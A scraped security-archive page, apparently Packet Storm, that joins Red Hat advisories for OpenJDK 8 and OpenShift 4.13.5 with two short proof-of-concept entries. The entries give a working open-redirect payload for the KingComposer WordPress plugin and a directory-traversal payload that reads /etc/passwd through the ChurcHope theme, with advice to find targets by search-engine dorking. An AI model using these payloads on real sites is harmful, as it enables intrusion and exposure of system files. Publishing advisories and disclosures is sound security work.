* OpenJDK: improper handling of slash characters in URI-to-path conversion  
(8305312) (CVE-2023-22049)

* OpenJDK: array indexing integer overflow issue (8304468) (CVE-2023-22045)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Prepare for the next quarterly OpenJDK upstream release (2023-07, 8u382)  
[rhel-9] (BZ#2220662)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2220662 - Prepare for the next quarterly OpenJDK upstream release (2023-07, 8u382) [rhel-9] [rhel-9.2.0.z]  
2221645 - CVE-2023-22045 OpenJDK: array indexing integer overflow issue (8304468)  
2221647 - CVE-2023-22049 OpenJDK: improper handling of slash characters in URI-to-path conversion (8305312)

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
java-1.8.0-openjdk-1.8.0.382.b05-2.el9.src.rpm

aarch64:  
java-1.8.0-openjdk-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-2.el9.aarch64.rpm

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.382.b05-2.el9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.382.b05-2.el9.noarch.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-2.el9.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.382.b05-2.el9.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-2.el9.s390x.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.382.b05-2.el9.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-2.el9.s390x.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.382.b05-2.el9.s390x.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-2.el9.s390x.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.382.b05-2.el9.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-2.el9.s390x.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.382.b05-2.el9.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-2.el9.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-2.el9.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 9):

aarch64:  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.382.b05-2.el9.aarch64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.382.b05-2.el9.aarch64.rpm

ppc64le:  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.382.b05-2.el9.ppc64le.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.382.b05-2.el9.ppc64le.rpm

x86_64:  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.382.b05-2.el9.x86_64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.382.b05-2.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-22045  
https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuYZxAAoJENzjgjWX9erE42cP/1i8b/vfeGY6gUCxlrsVkXGy  
RqV2OhsYAmHYJzbbBfJ9ICZN1IH4sqUpD91AYisTDtZqfwHUw+EcIb6eq+oT5jc0  
UbY6tAIDLa1WWlLBaefPd8+f4hkSBnXMgceZ1G1CfOLHc1ydpKoCwoN3AgTrntD1  
DuxSy9Q9cPEJ6OpomipxCEHRwxWCQjfUlsrU+QFPDd9zY+inibcRRWzfKF3goIh8  
Wuzyc/5UCJwyjLaLMtIevscTaIkbRhMfITWhu7qHizabI7Qr3yNif8zyA9sPEy3k  
veHcArjXLqbmHU49P0bp31lqrb3L4NnSP5MRRV6018ychnO1atrbsIEqsiATjF/J  
/J+DNGgxe1OTzB5jWyFMZibhJc+G0Yakddvr7XzMtbUl28jhWljjsZ2u+0BjERvP  
Sa36lt7+NBVZLf7KLFyOsvBb90q3QbitlUV0LJ0QZn5ccSiu1jEFH+JEzVGaLVAE  
fhw6AFvClWeYMFsn+3tdyKMMLJU76zIuMYWwLn8ahUb7pYy1vJJQOGOu0FDSG5mk  
XSiAte4R887nfHU+wNkYJsYhf0e7/BHAgXoKzho46St9JYHyPtmNJNFm7C97fRz9  
zMKJdB+wmKcQVObkdb9FJSD16BM8ERet2IwBaWKH+5FnfcSdK2yOFJYZLP63CBWO  
KMFCk6oE84w/iDfY/0rl  
=KxOl  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4178-01

Red Hat Security Advisory 2023-4093-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.13.5. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2023-4093-01

WordPress Page Builder KingComposer plugin version 2.9.5 suffers from an open redirection vulnerability.

    ====================================================================================================================================| # Title     : WordPress Page Builder KingComposer 2.9.5 Open Redirect Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://kingcomposer.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/[+] https://example.com/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WordPress Page Builder KingComposer 2.9.5 Open Redirection

WordPress ChurcHope Responsive Themes version 4.7.x suffers from a directory traversal vulnerability.

**WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal**

Posted Jul 21, 2023

Authored by indoushka

WordPress ChurcHope Responsive Themes version 4.7.x suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 5725a62c968e651e09b1218973491c6cf875301d455e111d6a9f075de9cbe5f8

Download | Favorite | View

**WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - ChurcHope Responsive Themes 4.7.x Directory Traversal Vulnerability                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://themeforest.net/item/churchope-responsive-wordpress-theme/2708562                                           |  | # Dork      : "/wp-content/themes/churchope/lib/"                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwd[+] http://127.0.0.1/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwdGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal

Red Hat Security Advisory 2023-4091-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.5. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.13.5 security update  
Advisory ID:       RHSA-2023:4091-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4091  
Issue date:        2023-07-20  
CVE Names:         CVE-2022-4304 CVE-2022-4450 CVE-2022-41717   
                   CVE-2022-41723 CVE-2022-46663 CVE-2023-0215   
                   CVE-2023-0361 CVE-2023-0464 CVE-2023-0465   
                   CVE-2023-0466 CVE-2023-1255 CVE-2023-1260   
                   CVE-2023-2253 CVE-2023-2650 CVE-2023-2700   
                   CVE-2023-3089 CVE-2023-24329 CVE-2023-24534   
                   CVE-2023-24536 CVE-2023-24537 CVE-2023-24538   
                   CVE-2023-24539 CVE-2023-27561 CVE-2023-29400   
                   CVE-2023-32067   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.13.5 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.13.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.13.5 See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:4093

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* golang: net/http: excessive memory growth in a Go server accepting HTTP/2  
requests (CVE-2022-41717)

* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK  
decoding (CVE-2022-41723)

* distribution/distribution: DoS from malicious API request (CVE-2023-2253)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.13 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:  
https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-12-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:af19e94813478382e36ae1fa2ae7bbbff1f903dded6180f4eb0624afe6fc6cd4

(For s390x architecture)  
The image digest is  
sha256:d4d2c747fade057e55f64e02a34bb752bd2cd1484b02f029d0842d346f872870

(For ppc64le architecture)  
The image digest is  
sha256:48466f0b7c86292379c5d987ec37f0d4a4cc26a69357374e127a7293b230c943

(For aarch64 architecture)  
The image digest is  
sha256:e9afcbe007e2440d2b862dc7709138df73dd851421d69c7f39f195301e0cda53

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2161274 - CVE-2022-41717 golang: net/http: excessive memory growth in a Go server accepting HTTP/2 requests  
2178358 - CVE-2022-41723 net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding  
2189886 - CVE-2023-2253 distribution/distribution: DoS from malicious API request

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-10326 - Re-enable operator-install-single-namespace.spec.ts test  
OCPBUGS-11143 - [Azure] Replace master failed as new master did not add into lb backend   
OCPBUGS-11974 - User telemetry is broken (inaccurate) due to the fact that page titles are not unique.  
OCPBUGS-12206 - [4.13] Keep systemd journal using LZ4 compression (via new env var)  
OCPBUGS-12256 - ptp operator socket management need rework since a few test case fails due to cleaning up the file before other processes are terminated.  
OCPBUGS-12743 - [4.13] SNO cluster deployment failing due to authentication and console CO in degraded state  
OCPBUGS-12785 - [release-4.13] Enable/Disable plugin options are not shown on Operator details page  
OCPBUGS-13311 - Kubelet CA file not written by MCD firstboot  
OCPBUGS-13323 - [4.13] Bootimage bump tracker  
OCPBUGS-13642 - [release-4.13] OLM k8sResourcePrefix x-descriptor dropdown unexpectedly clears selections  
OCPBUGS-13747 - [4.13] cgroupv1 support for cpu balancing is broken for non-SNO nodes  
OCPBUGS-13752 - AdditionalTrustBundle is only included when doing mirroring  
OCPBUGS-13809 - OVN image pre-puller pod uses `imagePullPolicy: Always` and blocks upgrade when there is no registry  
OCPBUGS-13812 - [azure] Installer doesn't validate diskType on ASH which lead to install fails with unsupported disktype  
OCPBUGS-14030 - Invalid CA certificate bundle provided by service account token  
OCPBUGS-14166 - Make Serverless form is broken  
OCPBUGS-14189 - Route Checkbox getting checked even if it is unchecked during editing the Serverless Function form  
OCPBUGS-14251 - Add new console metrics to cluster-monitoring-operator telemetry configuration (4.13)  
OCPBUGS-14267 - [Openshift Pipelines] Metrics page is broken  
OCPBUGS-14310 - Could not import multiple resources via JSON (while YAML supports this)  
OCPBUGS-14318 - [release-4.13] gather podDisruptionBudget only from openshift namespaces  
OCPBUGS-14336 - [Openshift Pipelines] Link to Openshift Route from service is breaking because of hardcoded value of targetPort  
OCPBUGS-14426 - Failed to list Kepler CSV  
OCPBUGS-14459 - The MCD repeats a "State and Reason" log line even when nothing is happening  
OCPBUGS-14482 - Sync RHEL9 Dockerfiles to regular Dockerfiles  
OCPBUGS-14598 - Update Jenkins to use 4.13 images  
OCPBUGS-14773 - (release-4.13) gather "gateway-mode-config" config map from "openshift-network-operator" namespace  
OCPBUGS-14867 - When installing SNO with bootstrap in place it takes cluster-policy-controller 6 minutes to acquire the leader lease  
OCPBUGS-14916 - images: RHEL-8-based container image is broken  
OCPBUGS-14943 - visiting Configurations page returns error Cannot read properties of undefined (reading 'apiGroup')  
OCPBUGS-15031 - (release-4.13) Insights config not correctly deserialized  
OCPBUGS-15101 - IngressVIP getting attach to two nodes at once  
OCPBUGS-15130 - Helm Repository "Edit" button results in 404  
OCPBUGS-15139 - The whereabouts-reconciler should not set an hard-coded node selector on the kubernetes.io/architecture label  
OCPBUGS-15161 - CPMS: Surface cpms vs machine diff  
OCPBUGS-15171 - CPO doesn't skip AWS resource deletion for 'Unknown' OIDC state  
OCPBUGS-15187 - images: RHEL-8 container image is missing `xz`  
OCPBUGS-15224 - [4.13] openvswitch user is not in the hugetblfs group  
OCPBUGS-15225 - while/after upgrading to OKD 4.11 2023-01-14 CoreDNS has a problem with UDP overflows  
OCPBUGS-15228 - Create helm release page doesn't show a YAML editor when schema isn't available (httpd-imagestreams chart)  
OCPBUGS-15230 - Allow installer to use existing Azure NSG during OpenShift IPI install  
OCPBUGS-15246 - Bump to kubernetes 1.26.6  
OCPBUGS-15281 - Leftover IngressController Preventing Clean Uninstall  
OCPBUGS-15289 - GCP XPN Installs Require bindPrivateDNSZone Permission in host project  
OCPBUGS-15330 - CPMSO: fix linting issue comment in test  
OCPBUGS-15335 - PipelineRun failed with log 'Tasks Completed: 3 (Failed: 1, Cancelled 0), Skipped: 1.'  
OCPBUGS-15360 - Serverless functions UI warning is misleading  
OCPBUGS-15372 - [4.13z] Duplicate acls cause network policy failure for namespaces with long names (>61 chars)  
OCPBUGS-15376 - [4.13] Cleanup Tech debt: remove unused repo code  
OCPBUGS-15410 - [release-4.13] Add Git Repository (PAC) doesn't setup GitLab and Bitbucket configuration correct  
OCPBUGS-15434 - [GWAPI] [4.13.z] The DNS provider failed to ensure the record, invalid value for name (gcp)  
OCPBUGS-15457 - python-grpcio and python-protobuf are unneeded dependencies  
OCPBUGS-15463 - [release-4.13] Unable to set protectKernelDefaults from "true" to "false" in kubelet.conf [release-4.13]  
OCPBUGS-15465 - [CI Watcher] Testing uninstall of Business Automation Operator "attempts to uninstall the Operator and delete all Operand Instances, shows 'Error Deleting Operands' alert"  
OCPBUGS-15476 - Network Operator not setting its version and blocking upgrade completion  
OCPBUGS-15481 - [CI Watcher] Broken pipeline-plugin e2e tests: PipelineResource CRD isn't installed anymore  
OCPBUGS-15512 - HCP Service Loadbalancer uses default SecurityGroup  
OCPBUGS-15515 - CI fails on TestAWSELBConnectionIdleTimeout  
OCPBUGS-15557 - TUI stuck on agent installer network boot setup  
OCPBUGS-15580 - updated nmstate builds will not work for MCO  
OCPBUGS-15585 - [4.13] Cannot fix a misconfigured Egress Firewall  
OCPBUGS-15586 - [4.13] NetworkPolicy not working as expected when allowing inbound traffic from any namespace  
OCPBUGS-15589 - Dynamic conversion webhook clientConfig not retained as operator installs  
OCPBUGS-15591 - GCP bootstrap VM should allow SecureBoot setting on 4.13 clusters  
OCPBUGS-15606 - Can't use git lfs in BuildConfig git source with strategy Docker  
OCPBUGS-15608 - [release-4.13] Clean up old RHEL9 dockerfiles to reduce confusion  
OCPBUGS-15720 - Helm Chart installation form hangs on create if JSON-schema is using 2019-09 or 2020-20 standard revisions  
OCPBUGS-15721 - Helm Chart installation form hangs on create if JSON-schema contains unknown value format  
OCPBUGS-15722 - Helm Chart installation screen fails to render if JSON schema contains remote $refs  
OCPBUGS-15734 - [4.13] binary should be compiled on RHEL9  
OCPBUGS-15736 - TuneD reverts node level profiles on termination  
OCPBUGS-15738 - tuned daemonset rprivate default mount propagation with `hostPath: path: /`  volumeMount breaks CSI driver relying on multipath  
OCPBUGS-15746 - Alibaba clusters are TechPreview and should not be upgradeable  
OCPBUGS-15756 - [release-4.13] Bump Jenkins and Jenkins Agent Base image versions  
OCPBUGS-15777 - ironic-agent-image PRs permafailing due to udevadm command missing  
OCPBUGS-15782 - [OSD] There is no error message shown on node label edit modal  
OCPBUGS-15787 - Project admins cannot see 'Pipelines' section in 'import from git' from RHOCP4 web console  
OCPBUGS-15808 - [4.13.x] Downstream OLM PSA plug-in is disabled  
OCPBUGS-15848 - The upgrade Helm Release tab in OpenShift GUI Developer console is not refreshing with updated values.  
OCPBUGS-15892 - 9% of OKD tests failing on error: tag latest failed: Internal error occurred: registry.centos.org/dotnet/dotnet-31-centos7:latest: Get "https://registry.centos.org/v2/": dial tcp: lookup registry.centos.org on 172.30.0.10:53: no such host  
OCPBUGS-15962 - ovn-k8s-cni-overlay: /lib64/libc.so.6: version `GLIBC_2.34' not found on 4.12-to-4.13  
OCPBUGS-15965 - Active Endpoint Connection blocks cluster uninstallation  
OCPBUGS-16084 - [4.13] OCP 4.14.0-ec.3 machine-api-controller pod crashing   
OCPBUGS-7762 - openshift-tests does not file Azure Disk zone topology

6. References:

https://access.redhat.com/security/cve/CVE-2022-4304  
https://access.redhat.com/security/cve/CVE-2022-4450  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-41723  
https://access.redhat.com/security/cve/CVE-2022-46663  
https://access.redhat.com/security/cve/CVE-2023-0215  
https://access.redhat.com/security/cve/CVE-2023-0361  
